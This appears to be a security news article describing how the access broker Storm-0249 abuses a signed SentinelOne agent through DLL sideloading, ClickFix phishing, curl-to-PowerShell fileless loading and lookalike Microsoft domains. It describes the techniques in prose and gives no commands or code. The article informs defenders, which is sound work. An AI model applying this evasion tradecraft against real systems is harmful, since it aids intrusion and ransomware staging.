Security’s Double Agent: How Storm-0249 Turned SentinelOne Against Defenders

Imagine deploying advanced security tools, only to discover they’ve been weaponized against you. That’s the unsettling reality faced by organizations targeted by Storm-0249, a cunning initial access broker (IAB) who’s rewriting the playbook on cyber infiltration. Their latest trick? Turning SentinelOne’s own security agent into a silent accomplice for ransomware attacks.

A Trojan Horse Inside Your EDR

According to recent research by ReliaQuest and TrendMicro, Storm-0249 has shifted from generic phishing to highly targeted attacks that subvert the very endpoint detection and response (EDR) tools meant to protect organizations. Their scheme hinges on DLL sideloading, a technique where a malicious library is loaded by a legitimate, signed executable - here, SentinelOne’s SentinelAgentWorker.exe.

Here’s how the attack unfolds: Victims receive a phishing email urging them to fix a fabricated technical issue (“ClickFix”). Following the instructions, they unwittingly run a malicious installer with SYSTEM privileges. This installer drops a genuine, digitally signed SentinelOne agent into the user’s AppData folder - right next to a booby-trapped DLL (SentinelAgentCore.dll). When the agent launches, it loads the attacker’s code instead of the real library, all under the guise of routine security operations.

With this cloak of legitimacy, Storm-0249 can establish encrypted command-and-control channels, blending their malicious traffic with trusted EDR telemetry. Defenders monitoring network activity might not spot a thing - after all, it looks like just another day for SentinelOne.

Beyond Sideloading: Fileless Evasion and LoLBins

The attackers don’t stop at DLL sideloading. They abuse so-called “Living off the Land Binaries” (LoLBins) like curl.exe and reg.exe - standard Windows tools rarely flagged by security software. For example, curl.exe is used to fetch malicious scripts that are piped directly into PowerShell memory, bypassing disk-based antivirus scans and leaving hardly a trace.

Storm-0249 also spins up fake domains mimicking Microsoft URLs, tricking both users and security filters. Their reconnaissance includes extracting unique system identifiers (MachineGuid) to tailor their attacks and increase resale value for ransomware buyers.

Trust Exploited, Not Broken

Crucially, this isn’t a vulnerability in SentinelOne itself. The attackers are abusing the implicit trust in signed, legitimate binaries - turning defenders’ own tools into unwitting allies. It’s a sobering reminder: even the best security software can be weaponized if attackers are clever enough.